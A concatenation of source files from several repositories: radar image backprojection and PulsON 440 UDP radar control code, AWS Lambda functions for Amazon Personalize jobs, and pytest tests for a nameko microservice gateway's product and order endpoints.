# scan_data[s] = np.abs(scan_data[s])
# print("scan_data: "+str(scan_data))
sum_range_bins = np.sum(range_bins_list)
sum_range_bins = np.abs(sum_range_bins)
pixels[y][x] = sum_range_bins
end_time = time.time()
elapsed_time = end_time-start_time
print("Done.")
print("Elapsed time: "+str(elapsed_time))
imgplot = plt.imshow(pixels, interpolation="gaussian")
plt.show()
```
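The per-pixel loop above can be restated more compactly; this is a sketch under the same assumptions about the data layout (`platform_pos` is N x 3, `range_bins` is a sorted 1-D array, `scan_data` is indexed by pulse then range bin), using `searchsorted` in place of the Python-level `bisect` call.
```python
import numpy as np

def backproject_pixel(pixel_xyz, platform_pos, range_bins, scan_data):
    # One-way distance from every platform position to this pixel.
    dists = np.linalg.norm(platform_pos - pixel_xyz, axis=1)
    # Index of the range bin just below each distance (mirrors bisect_left - 1).
    bin_idx = np.searchsorted(range_bins, dists) - 1
    # Coherently sum the matching complex samples, then take the magnitude.
    return np.abs(scan_data[np.arange(len(bin_idx)), bin_idx].sum())
```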
#### File: main_code/pulson440/unpack_batch.py
```python
import numpy as np
from control import unpack
import argparse
import pickle
def main():
parser = argparse.ArgumentParser(description='batch unpacks data')
parser.add_argument('data_dir', type=str, help='the directory for all of the scan datas')
parser.add_argument('num_files', type=int, help='the number of files')
args = parser.parse_args()
data = []
for i in range(1, args.num_files + 1):
data.append(unpack(args.data_dir + '/scan_' + str(i) + '.txt'))
np_data = np.asarray(data)
print(list(data[1].keys()))
master_dict = {'scan_data': [], 'timestamps': [], 'pulse_idx': [], 'range_bins': [], 'packet_idx': [], 'config': []}
for i in data:
master_dict['scan_data'].append(i['scan_data'])
master_dict['timestamps'].append(i['timestamps'])
master_dict['pulse_idx'].append(i['pulse_idx'])
master_dict['range_bins'].append(i['range_bins'])
master_dict['packet_idx'].append(i['packet_idx'])
master_dict['config'].append(i['config'])
if __name__ == '__main__':
main()
```
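As written, `main()` assembles `master_dict` but never returns or persists it; below is a hypothetical continuation showing how it might be saved (the output filename is made up).
```python
import pickle

def save_master_dict(master_dict, out_path='batch_unpacked.pkl'):
    # Persist the combined dictionary next to the unpacked scans.
    with open(out_path, 'wb') as f:
        pickle.dump(master_dict, f)
```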
#### File: raw_code/pulson440/pulson440_stream.py
```python
__author__ = '<NAME>, <NAME>'
__version__ = '1.0'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
"""References
[1] Monostatic Radar Application Programming Interface (API) Specification
PulsON (R) 400 Series
Version: 1.2.2
Date: January 2015
https://timedomain.com/wp-content/uploads/2015/12/320-0298E-MRM-API-Specification.pdf
"""
# Update path
from pathlib import Path
import sys
if Path('..//').resolve().as_posix() not in sys.path:
sys.path.insert(0, Path('..//').resolve().as_posix())
# Import required modules and methods
from common.constants import SPEED_OF_LIGHT
from collections import OrderedDict
from copy import deepcopy
import math
import logging
import numpy as np
from pulson440.constants import BYTE_ORDER, DEFAULT_SETTINGS, DEFAULT_CONFIG, MAX_PACKET_SIZE, \
FOREVER_SCAN_COUNT, STOP_SCAN_COUNT, MIN_SCAN_COUNT, CONTINUOUS_SCAN_INTERVAL, DT_MIN, \
T_BIN, DN_BIN, SEG_NUM_BINS, UDP_IP_HOST, UDP_IP_RADAR, UDP_PORT_RADAR, REC_SCAN_RES, \
REC_PERSIST_FLAG
from pulson440.formats import MRM_CONTROL_CONFIRM, MRM_CONTROL_REQUEST, MRM_GET_CONFIG_CONFIRM, \
MRM_GET_CONFIG_REQUEST, MRM_SET_CONFIG_CONFIRM, MRM_SET_CONFIG_REQUEST
import socket
import time
import yaml
# Control file
CONTROL_FILENAME = 'control_radar'
class PulsON440:
"""Class for command and control of PulsON 440 radar."""
def __init__(self, logger=None, udp_ip_host=UDP_IP_HOST, udp_ip_radar=UDP_IP_RADAR,
udp_port_radar=UDP_PORT_RADAR):
"""Instance initialization.
Args:
logger (logging.Logger)
Configured logger.
udp_ip_host (str)
IP address of the host computer, i.e., the machine that commands the radar. Defaults
to pulson440_constants.UDP_IP_HOST.
udp_ip_radar (str)
String defining the IP address of the radar. Defaults to
pulson440_constants.UDP_IP_RADAR.
udp_port_radar (int)
Port on radar that the host computer should target when creating the UDP socket.
Defaults to pulson440_constants.UDP_PORT_RADAR.
"""
# Radar status indicators
self.connected = False
self.collecting = False
# Radar system parameters
self.N_bin = [] # Number of bins in scan
        # Connection settings
self.connection = {
'udp_ip_host': udp_ip_host, # Host (computer) IP address
'udp_ip_radar': udp_ip_radar, # Radar IP address
'udp_port_radar': udp_port_radar, # Radar port
'sock': []} # UDP socket
# User radar settings; partially higher abstraction than the radar's internal configuration;
self.settings = {key: value['default'] for key, value in DEFAULT_SETTINGS.items()}
# Radar internal configuration
self.config = DEFAULT_CONFIG
# Logger
self._logger = None
self.logger = logger
# Message counter
self.message_count = 0
# Control file
self.control_file_handle = []
def __del__(self):
"""Clean up actions upon object deletion."""
self.disconnect()
"""logger property decorators. Setter validates logger's types is a valid logger type."""
@property
def logger(self):
return self._logger
@logger.setter
def logger(self, value):
if value is None:
self._logger = logging.getLogger('trash')
self._logger.propagate = False
elif not issubclass(type(value), logging.getLoggerClass()):
raise TypeError('Specified logger of incorrect type; expecting subclass of ' +
'logging.Logger!')
else:
self._logger = value
def read_settings_file(self, settings_file='radar_settings.yml'):
"""Read user specified radar settings file.
Args:
settings_file (str)
Path and name of radar settings file.
Raises:
ValueError if setting is out of bounds.
"""
self.logger.info('Reading settings from \'{0}\'...'.format(settings_file))
with open(settings_file, 'r') as f:
            radar_settings = yaml.safe_load(f)
self.logger.info('Read following radar settings --> {0}'.format(radar_settings))
# Iterate over each user setting and check bounds if applicable
for setting, value in radar_settings.items():
if setting in DEFAULT_SETTINGS:
if ('bounds' in DEFAULT_SETTINGS[setting] and
DEFAULT_SETTINGS[setting]['bounds'] is not None):
bounds = DEFAULT_SETTINGS[setting]['bounds']
if not (bounds[0] <= value <= bounds[1]):
raise ValueError('Radar setting \'{0}\' is out of bounds!'.format(setting))
self.settings[setting] = value
else:
self.settings[setting] = value
# Update radar configuration
self.logger.debug('Following radar settings being used --> {0}'.format(self.settings))
self.settings_to_config()
def settings_to_config(self):
"""Translate radar settings into radar configuration."""
# Based on the specified start and stop ranges determine the scan start and stop times
scan_start = (2 * float(self.settings['range_start']) / (SPEED_OF_LIGHT / 1e9) +
self.settings['dT_0'])
scan_stop = (2 * float(self.settings['range_stop']) / (SPEED_OF_LIGHT / 1e9) +
self.settings['dT_0'])
N_bin = (scan_stop - scan_start) / T_BIN
N_bin = DN_BIN * math.ceil(N_bin / DN_BIN)
scan_start = math.floor(1000 * DT_MIN * math.floor(scan_start / DT_MIN))
scan_stop = N_bin * T_BIN + scan_start / 1000
scan_stop = math.floor(1000 * DT_MIN * math.ceil(scan_stop / DT_MIN))
# Update radar configuration
self.N_bin = N_bin
self.config['scan_start'] = scan_start
self.config['scan_stop'] = scan_stop
self.config['pii'] = self.settings['pii']
self.config['tx_gain_ind'] = self.settings['tx_gain_ind']
self.config['code_channel'] = self.settings['code_channel']
self.config['node_id'] = self.settings['node_id']
self.config['persist_flag'] = self.settings['persist_flag']
self.logger.debug(
'Settings parsed into following configuration --> {0}'.format(self.config))
def config_to_bytes(self):
"""Converts radar configuration to bytes so it can be written to file.
Returns:
config_bytes (bytes)
The current radar configuration (as stored in instance) represented as bytes.
"""
# Add all configuration fields
config_bytes = b''
for config_field, config_value in self.config.items():
dtype = MRM_GET_CONFIG_CONFIRM['packet_def'][config_field]
config_bytes += (config_value).to_bytes(length=dtype.itemsize, byteorder=BYTE_ORDER,
signed=np.issubdtype(dtype, np.signedinteger))
return config_bytes
def encode_host_to_radar_message(self, raw_payload, message_format):
"""Encode host to radar message.
Args:
raw_payload (dict)
Specifies the payload to encode. Each key must match exactly a key in packet_def
contained in message_format.
message_format (dict)
Message format as defined in formats.py. Primary keys are message_type and
packet_def.
Returns:
message (bytes)
The payload encoded into a byte sequence for transmission to the radar.
Raises:
KeyError if payload does not contain key that must be user defined.
"""
# Make a deep copy of payload to avoid malforming original
payload = deepcopy(raw_payload)
# Update payload w/ message type and ID
payload['message_type'] = message_format['message_type']
payload['message_id'] = self.message_count
# Add all packet fields to message
message = b''
for packet_field in message_format['packet_def'].keys():
dtype = message_format['packet_def'][packet_field][0]
default_value = message_format['packet_def'][packet_field][1]
# Check if current packet field is in payload
if packet_field not in payload:
if default_value is None:
raise KeyError('Payload for message type {0} missing field {1}'.format(
message_format['message_type'], packet_field))
else:
payload[packet_field] = default_value
# Add current packet field's payload value onto message
message += (payload[packet_field]).to_bytes(length=dtype.itemsize, byteorder=BYTE_ORDER,
signed=np.issubdtype(dtype, np.signedinteger))
return message
@staticmethod
def decode_radar_to_host_message(message, message_format):
"""Decode radar to host message.
Args:
message (bytes)
Message byte sequence received from radar.
message_format (dict)
Message format as defined in formats.py. Primary keys are message_type and
packet_def.
Returns:
payload (dict)
Payload decoded from message received from radar.
"""
# Initialize decoded payload
payload = OrderedDict.fromkeys(message_format['packet_def'])
# Iterate over each field in packet definition
byte_counter = 0
for packet_field, dtype in message_format['packet_def'].items():
num_bytes = dtype.itemsize
payload[packet_field] = int.from_bytes(message[byte_counter:(byte_counter + num_bytes)],
byteorder=BYTE_ORDER, signed=np.issubdtype(dtype, np.signedinteger))
byte_counter += num_bytes
return payload
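    # Illustrative decoding sketch (a hypothetical two-field packet definition rather
    # than one of the real MRM formats from formats.py), assuming BYTE_ORDER == 'big':
    #
    #   fmt = {'packet_def': OrderedDict([('message_type', np.dtype('uint16')),
    #                                     ('message_id', np.dtype('uint16'))])}
    #   PulsON440.decode_radar_to_host_message(b'\x12\x34\x00\x07', fmt)
    #   --> OrderedDict([('message_type', 0x1234), ('message_id', 7)])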
def connect(self):
"""Connect to radar and set up control file.
Raises:
RuntimeError if fails to connect to radar.
"""
# Try to connect to radar
self.logger.info('Trying to connect to radar...')
try:
self.connection['sock'] = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.connection['sock'].setblocking(False)
self.connection['sock'].bind((self.connection['udp_ip_host'],
self.connection['udp_port_radar']))
self.connected = True
except:
raise RuntimeError('Failed to connect to radar!')
# Set up the control file; 0 -> continue, 1 -> stop
self.control_file_handle = open(CONTROL_FILENAME, 'w')
self.control_file_handle.write('0')
self.control_file_handle.close()
self.control_file_handle = open(CONTROL_FILENAME, 'r+')
self.logger.info('Connected to radar!')
def disconnect(self):
"""Disconnect from radar and close control file.
Raises:
RuntimeError if fails to disconnect from radar.
"""
# Try to disconnect from radar if needed
if not self.connected:
            self.logger.info('Cannot disconnect, no radar connected!')
else:
self.logger.info('Trying to disconnect from radar...')
try:
if self.collecting:
self.scan_request(scan_count=STOP_SCAN_COUNT)
self.connection['sock'].close()
self.connected = False
self.logger.info('Disconnected from radar!')
except:
raise RuntimeError('Failed to disconnect from radar!')
# Close control file
if self.control_file_handle:
self.control_file_handle.close()
def get_radar_config(self):
"""Get configuration from radar.
Returns:
status_flag (int)
Status flag indicating success/failure of get configuration request. Any non-zero
value is a failure.
Raises:
RuntimeError if radar not already connected.
RuntimeError if fails to receive radar configuration within timeout.
"""
self.logger.info('Requesting radar configuration...')
# Make sure radar is connected
if self.connected:
# Request the current radar configuration
payload = {}
message = self.encode_host_to_radar_message(payload, MRM_GET_CONFIG_REQUEST)
self.connection['sock'].sendto(message,
(self.connection['udp_ip_radar'], self.connection['udp_port_radar']))
# Wait for radar configuration within the timeout
start = time.time()
status_flag = -1
while (time.time() - start) < self.settings['get_config_timeout']:
try:
message, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
payload = self.decode_radar_to_host_message(message, MRM_GET_CONFIG_CONFIRM)
self.config = OrderedDict([(key, payload[key]) for key in DEFAULT_CONFIG])
status_flag = payload['status']
break
except:
pass
if status_flag == -1:
raise RuntimeError('Get radar configuration timed out!')
elif status_flag != 0:
raise RuntimeError(('Failed to get radar configuration with error code ' +
'{0}!').format(status_flag))
self.logger.info('Get radar configuration successful!')
self.logger.debug('Radar configuration received --> {0}'.format(self.config))
return status_flag
else:
raise RuntimeError('Radar not connected!')
def set_radar_config(self):
"""Set radar configuration based on user settings.
Returns:
            status_flag (int)
Status flag indicating success/failure of get configuration request. Any non-zero
value is a failure.
Raises:
RuntimeError if radar not already connected.
RuntimeError if fails to send radar configuration within timeout.
"""
# Make sure radar is connected
self.logger.info('Setting radar configuration...')
if self.connected:
# Determine desired configuration from user settings
self.settings_to_config()
# Scan resolution; API states that any value aside from 32 will likely cause undesired
# behavior so overwrite it
if self.config['scan_res'] != REC_SCAN_RES:
                self.logger.warning(('Overriding specified scan resolution of {0} with ' +
                                     'recommended value of {1}').format(self.config['scan_res'],
                                                                        REC_SCAN_RES))
self.config['scan_res'] = REC_SCAN_RES
# Configuration persistence flag
if self.config['persist_flag'] != REC_PERSIST_FLAG:
self.logger.warning('Specified persist flag value of {0} not the recommended '
'value of {1}'.format(self.config['persist_flag'],
REC_PERSIST_FLAG))
# Encode configuration into message and send
message = self.encode_host_to_radar_message(self.config, MRM_SET_CONFIG_REQUEST)
self.connection['sock'].sendto(message,
(self.connection['udp_ip_radar'], self.connection['udp_port_radar']))
# Poll for configuration set confirmation from radar within timeout
start = time.time()
status_flag = -1
while (time.time() - start) < self.settings['set_config_timeout']:
try:
message, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
payload = self.decode_radar_to_host_message(message, MRM_SET_CONFIG_CONFIRM)
status_flag = payload['status']
break
except:
pass
if status_flag == -1:
raise RuntimeError('Set radar configuration timed out!')
elif status_flag != 0:
raise RuntimeError(('Failed to set radar configuration with error code ' +
'{0}!').format(status_flag))
self.logger.info('Set radar configuration successful!')
self.logger.debug('Radar configuration set --> {0}'.format(self.config))
return status_flag
else:
raise RuntimeError('Radar not connected!')
def scan_request(self, scan_count, scan_interval=CONTINUOUS_SCAN_INTERVAL):
"""Initiate a set of scans by the radar.
Args:
scan_count (int)
Number of scans to request; refer to [1] for details.
scan_interval (int)
Interval between sequential scans (us); defaults to CONTINUOUS_SCAN_INTERVAL for
continuous scanning.
Returns:
status_flag (int)
Status flag indicating success/failure of get configuration request. Any non-zero
value is a failure.
Raises:
RuntimeError if radar not already connected.
            ValueError if scan_count is not between STOP_SCAN_COUNT and FOREVER_SCAN_COUNT.
RuntimeError if fails to send scan request within timeout.
"""
# Check if radar is connected and not already collecting data
if self.connected:
# Check if scan count is within bounds
if scan_count < STOP_SCAN_COUNT or scan_count > FOREVER_SCAN_COUNT:
raise ValueError(('Requested number of scans {0} is outside valid range of {1} ' +
'and {2}').format(scan_count, STOP_SCAN_COUNT,
FOREVER_SCAN_COUNT))
self.logger.info(('Requesting radar scan with {0} scans with scan interval ' +
'of {1}...').format(scan_count, scan_interval))
# Create scan request and send
payload = {'scan_count': scan_count, 'scan_interval': scan_interval}
message = self.encode_host_to_radar_message(payload, MRM_CONTROL_REQUEST)
self.connection['sock'].sendto(message,
(self.connection['udp_ip_radar'], self.connection['udp_port_radar']))
# Check if scan request was successful or not within timeout
if scan_count != STOP_SCAN_COUNT:
start = time.time()
status_flag = -1
while (time.time() - start) < self.settings['scan_request_timeout']:
try:
message, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
payload = self.decode_radar_to_host_message(message, MRM_CONTROL_CONFIRM)
status_flag = payload['status']
break
except:
pass
if status_flag == -1:
raise RuntimeError('Scan request timed out!')
elif status_flag != 0:
raise RuntimeError(('Failed scan request with error code {0}!').format(
status_flag))
self.logger.info('Scan request successful!')
return status_flag
else:
self.logger.info(('Stop scan request made; no confirmation from radar will be ' +
'provided!'))
return 0
else:
raise RuntimeError('Radar not connected!')
def read_scan_data(self, scan_data_filename=None, return_data=False, num_packets=None):
"""Read data returned from radar scans.
Args:
scan_data_filename (str)
Path and name of file to save radar scans to. If None then data is not saved.
Defaults to None.
return_data (bool)
Flag indicating whether or not to return read data; flag exists to avoid creating
large internal variables when not needed. Defaults to False.
num_packets (int)
Number of packets to read. Appropriate value depends on the configuration of the
                last scan request. If None then packets will be read until stop flag is posted to
control file. Defaults to None.
Returns:
scan_data (bytes)
                Scan data read from the radar. Needs to be unpacked to properly access scan
information. Will only be non-empty if return_data is set to True.
Raises:
            RuntimeError if radar is not connected.
"""
# Check if radar is connected and not already collecting data
if self.connected:
# Default return data
scan_data = b''
# Create scan data file if needed
if scan_data_filename is not None:
scan_data_file = open(scan_data_filename, 'wb')
# Add all configuration values to save file
config_bytes = self.config_to_bytes()
scan_data_file.write(config_bytes)
# Read fixed length or streaming data off radar
self.logger.info('Reading data from the radar...')
packet_count = 0
start = time.time()
while True:
try:
packet_data, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
if return_data:
scan_data += packet_data
if scan_data_filename is not None:
scan_data_file.write(packet_data)
packet_count += 1
start = time.time()
# Read the specified number of packets
if num_packets is not None:
if packet_count == num_packets:
break
# Read until stop flag has been posted to the control file
else:
self.control_file_handle.seek(0)
stop_flag = self.control_file_handle.read()
if stop_flag != '0':
self.scan_request(scan_count=STOP_SCAN_COUNT)
self.control_file_handle.close()
self.control_file_handle = open(CONTROL_FILENAME, 'w')
self.control_file_handle.write('0')
self.control_file_handle.close()
self.control_file_handle = open(CONTROL_FILENAME, 'r+')
break
                    # Periodically flush scan data to disk so nothing is lost if the
                    # process stops unexpectedly
                    if scan_data_filename is not None:
                        scan_data_file.flush()
# Check if single packet read timeout threshold has been violated
except:
if (time.time() - start) > self.settings['read_scan_data_timeout']:
raise RuntimeError('Radar scan data packet read timed out!')
# Read any remaining streaming radar data
if num_packets is not None:
start = time.time()
while (time.time() - start) < self.settings['read_residual_timeout']:
try:
packet_data, addr = self.connection['sock'].recvfrom(MAX_PACKET_SIZE)
if return_data:
scan_data += packet_data
if scan_data_filename is not None:
scan_data_file.write(packet_data)
except:
pass
self.logger.info('Successfully read all the data!')
# Close scan data file
if scan_data_filename is not None:
scan_data_file.close()
return scan_data
else:
raise RuntimeError('Radar not connected!')
def quick_look(self, scan_data_filename=None, return_data=False):
"""Executes quick-look with radar to confirm desired operation.
Args:
scan_data_filename (str)
Path and name of file to save radar scans to. If None then data is not saved.
Defaults to None.
return_data (bool)
Flag indicating whether or not to return read data; flag exists to avoid creating
large internal variables when not needed. Defaults to False.
Returns:
scan_data (bytes)
                Scan data read from the radar. Needs to be unpacked to properly access scan
information. Will only be non-empty if return_data is set to True.
Raises:
RuntimeError if scan data is not being either saved or returned.
            RuntimeError if radar is not connected or is already collecting data.
"""
# Check if data is being saved in some fashion
if not return_data and not scan_data_filename:
raise RuntimeError('Scan data not being saved to file or returned!')
# Compute number of expected data packets in quick-look
num_quick_look_packets = (math.ceil(float(self.N_bin) / SEG_NUM_BINS) *
self.settings['quick_look_num_scans'])
# Check if radar is connected and not already collecting data
if self.connected and not self.collecting:
self.logger.info('Starting quick-look mode...')
# Send a scan request
self.scan_request(self.settings['quick_look_num_scans'])
self.collecting = True
# Read streaming data from radar and save if desired
scan_data = self.read_scan_data(scan_data_filename, return_data, num_quick_look_packets)
self.collecting = False
self.logger.info('Completed quick-look mode!')
else:
raise RuntimeError('Radar not connected or is already collecting data!')
return scan_data
def collect(self, scan_count=FOREVER_SCAN_COUNT, scan_interval=CONTINUOUS_SCAN_INTERVAL,
scan_data_filename=None, return_data=False):
"""Collects radar data continuously until commanded to stop.
Args:
scan_count (int)
Number of scans to collect. Defaults to FOREVER_SCAN_COUNT.
scan_interval (int)
Interval between sequential scans (us). Defaults to CONTINUOUS_SCAN_INTERVAL.
scan_data_filename (str)
Path and name of file to save radar scans to. If None then data is not saved.
Defaults to None.
return_data (bool)
Flag indicating whether or not to return read data; flag exists to avoid creating
large internal variables when not needed. Defaults to False.
Returns:
scan_data (bytes)
                Scan data read from the radar. Needs to be unpacked to properly access scan
information. Will only be non-empty if return_data is set to True.
Raises:
ValueError if number of scans is less than minimum accepted value.
RuntimeError if scan data is not being either saved or returned.
            RuntimeError if radar is not connected or is already collecting data.
"""
# Check if number of scans is less than minimum
if scan_count < MIN_SCAN_COUNT:
raise ValueError('Cannot request less than {0} scans!'.format(MIN_SCAN_COUNT))
# Check if data is being saved in some fashion
if not return_data and not scan_data_filename:
raise RuntimeError('Scan data not being saved to file or returned!')
# Check if radar is connected and not already collecting data
if self.connected and not self.collecting:
self.logger.info('Starting collect mode with {0} scans...'.format(scan_count))
# Send a scan request
self.scan_request(scan_count=scan_count, scan_interval=scan_interval)
self.collecting = True
# Read either undetermined amount of data from continous scanning or predetermined
# amount of scan data based on finite scan count
num_packets = None
if scan_count != FOREVER_SCAN_COUNT:
num_packets = (math.ceil(float(self.N_bin) / SEG_NUM_BINS) * scan_count)
scan_data = self.read_scan_data(scan_data_filename=scan_data_filename,
return_data=return_data,
num_packets=num_packets)
self.collecting = False
self.logger.info('Stopped collect mode!')
else:
raise RuntimeError('Radar not connected or is already collecting data!')
return scan_data
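# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the radar API); it assumes a radar is
# reachable at the configured IP address/port and that a 'radar_settings.yml'
# file with the desired settings exists in the working directory.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    radar = PulsON440()
    radar.read_settings_file('radar_settings.yml')
    radar.connect()
    radar.set_radar_config()
    # Short quick-look collection saved to file to confirm desired operation
    radar.quick_look(scan_data_filename='quick_look_data.bin')
    # Continuous collection; runs until a stop flag is posted to the control file
    radar.collect(scan_data_filename='scan_data.bin')
    radar.disconnect()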
``` |
{
"source": "jjin-2019/recommender-system-dev-workshop-code",
"score": 2
} |
#### File: offline/lambda/check-batch-inference-job-status-lambda.py
```python
import json
import os
import boto3
print('Loading function')
def init():
print('init() enter')
my_config = json.loads(os.environ['botoConfig'])
from botocore import config
config = config.Config(**my_config)
global personalize
personalize = boto3.client('personalize', config=config)
def lambda_handler(event, context):
init()
try:
print("Received event: " + json.dumps(event, indent=2))
return do_handler(event, context)
except Exception as e:
print(e)
raise e
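# Illustrative input event (hypothetical ARN value) expected by do_handler, e.g. as
# produced by an upstream Step Functions task named 'createBatchInferenceJob':
# {
#     "createBatchInferenceJob": {
#         "Payload": {
#             "batch_inference_job_arn": "arn:aws:personalize:ap-northeast-1:123456789012:batch-inference-job/example-job"
#         }
#     }
# }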
def do_handler(event, context):
batch_inference_job_arn = event['createBatchInferenceJob']['Payload']['batch_inference_job_arn']
describe_batch_inference_job_response = personalize.describe_batch_inference_job(
batchInferenceJobArn=batch_inference_job_arn
)
status = describe_batch_inference_job_response["batchInferenceJob"]["status"]
print("Batch Inference Job Status: {}".format(status))
return {
"statusCode": 200,
"batch_inference_job_arn": batch_inference_job_arn,
"batch_inference_job_status": status
}
```
#### File: lambda/personalize/create-dataset-import-job-lambda.py
```python
import json
import os
import time
import boto3
print('Loading function')
def init():
print('init() enter')
my_config = json.loads(os.environ['botoConfig'])
from botocore import config
config = config.Config(**my_config)
global personalize
global sts
personalize = boto3.client('personalize', config=config)
sts = boto3.client('sts', config=config)
def lambda_handler(event, context):
init()
try:
print("Received event: " + json.dumps(event, indent=2))
return do_handler(event, context)
except Exception as e:
print(e)
raise e
stage = "dev"
def do_handler(event, context):
global stage
stage = os.environ.get('Stage', 'dev')
bucket = event['bucket']
s3_key_prefix = event['prefix']
dataset_group_name = event['datasetGroupName']
dataset_name = event['datasetName']
file_name = event['fileName']
dataset_group_arn = get_dataset_group_arn(dataset_group_name)
print("dataset_group_arn:{}".format(dataset_group_arn))
dataset_arn = get_dataset_arn(dataset_group_arn, dataset_name)
print("dataset_arn:{}".format(dataset_arn))
get_caller_identity_response = sts.get_caller_identity()
aws_account_id = get_caller_identity_response["Account"]
print("aws_account_id:{}".format(aws_account_id))
role_arn = "arn:aws:iam::{}:role/gcr-rs-{}-personalize-role".format(aws_account_id, stage)
print("role_arn:{}".format(role_arn))
create_dataset_import_job_response = personalize.create_dataset_import_job(
jobName="dataset-import-job-{}".format(int(time.time())),
datasetArn=dataset_arn,
dataSource={
"dataLocation": "s3://{}/{}/system/personalize-data/{}".format(bucket, s3_key_prefix, file_name)
},
roleArn=role_arn
)
dataset_import_job_arn = create_dataset_import_job_response['datasetImportJobArn']
print("dataset_import_job_arn:{}".format(dataset_import_job_arn))
return success_response(json.dumps({
"dataset_import_job_arn": dataset_import_job_arn
}))
def get_dataset_group_arn(dataset_group_name):
response = personalize.list_dataset_groups()
for dataset_group in response["datasetGroups"]:
if dataset_group["name"] == dataset_group_name:
return dataset_group["datasetGroupArn"]
def get_dataset_arn(dataset_group_arn, dataset_name):
response = personalize.list_datasets(
datasetGroupArn=dataset_group_arn
)
for dataset in response["datasets"]:
if dataset["name"] == dataset_name:
return dataset["datasetArn"]
def success_response(message):
return {
"statusCode": 200,
"headers": {
"Content-Type": "application/json"
},
"body": message
}
def error_response(message):
return {
"statusCode": 400,
"headers": {
"Content-Type": "application/json"
},
"body": message
}
``` |
{
"source": "JJINDAHOUSE/nameko-study",
"score": 3
} |
#### File: test/interface/test_service.py
```python
import json
from mock import call
from gateway.exceptions import OrderNotFound, ProductNotFound
class TestGetProduct(object):
def test_can_get_product(self, gateway_service, web_session):
gateway_service.products_rpc.get.return_value = {
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
}
response = web_session.get('/products/the_odyssey')
assert response.status_code == 200
assert gateway_service.products_rpc.get.call_args_list == [
call("the_odyssey")
]
assert response.json() == {
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
}
def test_product_not_found(self, gateway_service, web_session):
gateway_service.products_rpc.get.side_effect = (
ProductNotFound('missing'))
        # call the gateway service to get a product that does not exist
response = web_session.get('/products/foo')
assert response.status_code == 404
payload = response.json()
assert payload['error'] == 'PRODUCT_NOT_FOUND'
assert payload['message'] == 'missing'
class TestCreateProduct(object):
def test_can_create_product(self, gateway_service, web_session):
response = web_session.post(
'/products',
json.dumps({
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
})
)
assert response.status_code == 200
assert response.json() == {'id': 'the_odyssey'}
assert gateway_service.products_rpc.create.call_args_list == [call({
"in_stock": 10,
"maximum_speed": 5,
"id": "the_odyssey",
"passenger_capacity": 101,
"title": "The Odyssey"
})]
def test_create_product_fails_with_invalid_json(
self, gateway_service, web_session
):
response = web_session.post(
'/products', 'NOT-JSON'
)
assert response.status_code == 400
assert response.json()['error'] == 'BAD_REQUEST'
def test_create_product_fails_with_invalid_data(
self, gateway_service, web_session
):
response = web_session.post(
'/products',
json.dumps({"id": 1})
)
assert response.status_code == 400
assert response.json()['error'] == 'VALIDATION_ERROR'
class TestGetOrder(object):
def test_can_get_order(self, gateway_service, web_session):
# setup mock orders-service response:
gateway_service.orders_rpc.get_order.return_value = {
'id': 1,
'order_details': [
{
'id': 1,
'quantity': 2,
'product_id': 'the_odyssey',
'price': '200.00'
},
{
'id': 2,
'quantity': 1,
'product_id': 'the_enigma',
'price': '400.00'
}
]
}
# setup mock products-service response:
gateway_service.products_rpc.list.return_value = [
{
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
{
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
]
# call the gateway service to get order #1
response = web_session.get('/orders/1')
assert response.status_code == 200
expected_response = {
'id': 1,
'order_details': [
{
'id': 1,
'quantity': 2,
'product_id': 'the_odyssey',
'image':
'http://example.com/airship/images/the_odyssey.jpg',
'product': {
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
'price': '200.00'
},
{
'id': 2,
'quantity': 1,
'product_id': 'the_enigma',
'image':
'http://example.com/airship/images/the_enigma.jpg',
'product': {
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
'price': '400.00'
}
]
}
assert expected_response == response.json()
# check dependencies called as expected
assert [call(1)] == gateway_service.orders_rpc.get_order.call_args_list
assert [call()] == gateway_service.products_rpc.list.call_args_list
def test_order_not_found(self, gateway_service, web_session):
gateway_service.orders_rpc.get_order.side_effect = (
OrderNotFound('missing'))
# call the gateway service to get order #1
response = web_session.get('/orders/1')
assert response.status_code == 404
payload = response.json()
assert payload['error'] == 'ORDER_NOT_FOUND'
assert payload['message'] == 'missing'
class TestCreateOrder(object):
def test_can_create_order(self, gateway_service, web_session):
# setup mock products-service response:
gateway_service.products_rpc.list.return_value = [
{
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
{
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
]
# setup mock create response
gateway_service.orders_rpc.create_order.return_value = {
'id': 11,
'order_details': []
}
# call the gateway service to create the order
response = web_session.post(
'/orders',
json.dumps({
'order_details': [
{
'product_id': 'the_odyssey',
'price': '41.00',
'quantity': 3
}
]
})
)
assert response.status_code == 200
assert response.json() == {'id': 11}
assert gateway_service.products_rpc.list.call_args_list == [call()]
assert gateway_service.orders_rpc.create_order.call_args_list == [
call([
{'product_id': 'the_odyssey', 'quantity': 3, 'price': '41.00'}
])
]
def test_create_order_fails_with_invalid_json(
self, gateway_service, web_session
):
# call the gateway service to create the order
response = web_session.post(
'/orders', 'NOT-JSON'
)
assert response.status_code == 400
assert response.json()['error'] == 'BAD_REQUEST'
def test_create_order_fails_with_invalid_data(
self, gateway_service, web_session
):
# call the gateway service to create the order
response = web_session.post(
'/orders',
json.dumps({
'order_details': [
{
'product_id': 'the_odyssey',
'price': '41.00',
}
]
})
)
assert response.status_code == 400
